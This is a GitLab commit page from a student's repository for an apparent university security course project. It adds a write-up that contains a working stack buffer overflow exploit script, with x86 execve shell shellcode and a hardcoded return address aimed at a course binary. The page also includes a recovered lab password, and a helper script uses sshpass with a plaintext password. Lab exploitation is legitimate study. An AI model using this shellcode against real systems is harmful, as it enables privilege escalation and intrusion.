Skip to content
GitLab
Explore
Sign in
Primary navigation
Search or go to…
Project
C
cs161
Manage
Activity
Members
Labels
Plan
Issues
0
Issue boards
Milestones
Wiki
Code
Merge requests
0
Repository
Branches
Commits
Tags
Repository graph
Compare revisions
Snippets
Build
Pipelines
Jobs
Pipeline schedules
Artifacts
Deploy
Releases
Model registry
Operate
Environments
Monitor
Incidents
Analyze
Value stream analytics
Contributor analytics
CI/CD analytics
Repository analytics
Model experiments
Help
Help
Support
GitLab documentation
Compare GitLab plans
Community forum
Contribute to GitLab
Provide feedback
Terms and privacy
Keyboard shortcuts
?
Snippets
Groups
Projects
Show more breadcrumbs
recolic-hust
cs161
Commits
62aac5ca
There was an error fetching the commit references. Please try again later.
Unverified
Commit
62aac5ca
authored
6 years ago
by
Recolic Keghart
Browse files
Options
Downloads
Patches
Plain Diff
p1 done
parent
2b81d226
No related branches found
No related tags found
No related merge requests found
Changes
2
Hide whitespace changes
Inline
Side-by-side
Showing
2 changed files
proj1/explain.md
+43
-1
43 additions, 1 deletion
proj1/explain.md
proj1/ssh.sh
+8
-3
8 additions, 3 deletions
proj1/ssh.sh
with
51 additions
and
4 deletions
proj1/explain.md
+
43
−
1
View file @
62aac5ca
# 1
#
# 1
The makefile is interesting and I think the professor tried his best to
make the program unsafe.
...
...
@@ -56,3 +56,45 @@ You have to let it all go. Fear, doubt, and disbelief. Free your mind.
Next username: smith
Next password: 37ZFBrAPm8
```
My code is attached below
```
############# egg3
#!/usr/bin/python3
def fuck8(txt):
assert(len(txt) == 8)
return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
def revert(txt):
assert(len(txt) % 8 == 0)
res = ""
for i in range(int(len(txt) / 8)):
res += fuck8(txt[i*8:(i+1)*8])
return res
fill = "0123456789abcdef0123456789abcdef01234567"
#cs161-ace# raddr = "bffffa40"
#cs161-atw# raddr = "bffffad0"
raddr = "bffffad0"
#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
########################################################################################### <- append an endline (0x0a, \n)
payload = revert(fill) + revert(raddr) + (shellcode)
print(payload)
import binascii
b = binascii.unhexlify(payload)
with open('input.txt','wb+') as f:
f.write(b)
############# egg
#!/bin/bash
./egg3 > /dev/null
cat input.txt # | invoke dejavu
```
## 2
This diff is collapsed.
Click to expand it.
proj1/ssh.sh
+
8
−
3
View file @
62aac5ca
#!/bin/sh
#echo 'Use password r4e8kWpeFC'
#ssh vsftpd@localhost -p 16161
sshpass
-p
r4e8kWpeFC ssh
-o
PreferredAuthentications
=
password
-o
PubkeyAuthentication
=
no vsftpd@localhost
-p
16161
if
[[
$1
==
remote
]]
;
then
echo
'Connecting ucb cs161 autograde machine...'
u
=
atw
ssh
-t
cs161-
$u
@hive
$((
36
#${u:2}%26+1)).cs.berkeley.edu \~cs161/proj1/start
else
echo
'Connecting localhost...'
sshpass
-
p r4e8kWpeFC ssh
-
o
PreferredAuthentications
=
password
-
o
PubkeyAuthentication
=
no vsftpd@localhost
-
p
16161
fi
This diff is collapsed.
Click to expand it.
Preview
0%
Loading
Try again
or
attach a new file
.
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Save comment
Cancel
Please
register
or
sign in
to comment